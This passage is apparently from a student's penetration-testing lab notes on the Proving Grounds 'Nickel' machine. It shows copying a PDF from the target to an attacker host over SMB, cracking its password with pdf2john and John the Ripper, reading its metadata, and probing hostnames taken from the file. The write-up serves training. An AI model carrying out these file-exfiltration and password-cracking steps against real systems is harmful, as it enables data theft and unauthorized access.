PDF File
Checking filesystem after completing the manual enumeration
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/1/2020 12:38 PM ftp
d----- 9/1/2020 12:04 PM PerfLogs
d-r--- 4/14/2022 5:22 AM Program Files
d-r--- 4/14/2022 4:43 AM Program Files (x86)
d-r--- 9/1/2020 12:38 PM Users
d----- 4/14/2022 5:23 AM Windows
-a---- 3/5/2025 12:16 PM 2693 output.txt
PS C:\> ls .\ftp\
Directory: C:\ftp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/1/2020 11:02 AM 46235 Infrastructure.pdfThe C:\ftp directory contains an interesting PDF file; Infrastructure.pdf
PS C:\ftp> copy .\Infrastructure.pdf \\192.168.45.153\smb\Transferring it to Kali over SMB
Infrastructure.pdf
/Practice/Nickel/4-Post_Enumeration/attachments/{3FDB49D7-5153-4199-8EB1-F17F56252F05}.png)
The Infrastructure.pdf file is password-protected
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ pdf2john Infrastructure.pdf > Infrastructure.pdf.hashTurning the file into crack-able hashstring
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ john ./Infrastructure.pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168 (Infrastructure.pdf)
1g 0:00:00:20 DONE (2025-03-05 21:36) 0.04952g/s 495510p/s 495510c/s 495510C/s arian69..aria_1988
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed. Password cracked; ariah4168
Unlocked
/Practice/Nickel/4-Post_Enumeration/attachments/Pasted-image-20250305213721.png)
/Practice/Nickel/4-Post_Enumeration/attachments/{3A484DE7-20B1-461A-BDEE-A9CABB28125B}.png)
The file contains 2 additional hostname
nickel-backupcorp-nas
PS C:\Users\ariah> curl http://nickel-backup/backup
curl : The remote name could not be resolved: 'nickel-backup'
At line:1 char:1
+ curl http://nickel-backup/backup
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\Users\ariah> curl http://corp-nas/files
curl : The remote name could not be resolved: 'corp-nas'
At line:1 char:1
+ curl http://corp-nas/files
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommandNone of them could be resolved from within the target system
/Practice/Nickel/4-Post_Enumeration/attachments/{8E0AF36C-0926-46E7-BCFD-3BAB7A4A7078}.png)
Interestingly, it mentions that the web app on the target port 80 is a temporary command endpoint
Note the ? character at the end
Further investigation is needed
metadata
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ exiftool -a ./Infrastructure.pdf
ExifTool Version Number : 13.10
File Name : Infrastructure.pdf
Directory : .
File Size : 46 kB
File Modification Date/Time : 2020:09:01 21:38:15+02:00
File Access Date/Time : 2025:03:05 21:32:08+01:00
File Inode Change Date/Time : 2025:03:05 21:31:49+01:00
File Permissions : -rwxrwxr-x
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.7
Linearized : No
Encryption : Standard V4.4 (128-bit)
User Access : Print, Modify, Copy, Fill forms, Extract, Print high-res
Warning : Document is password protected (use Password option)N/A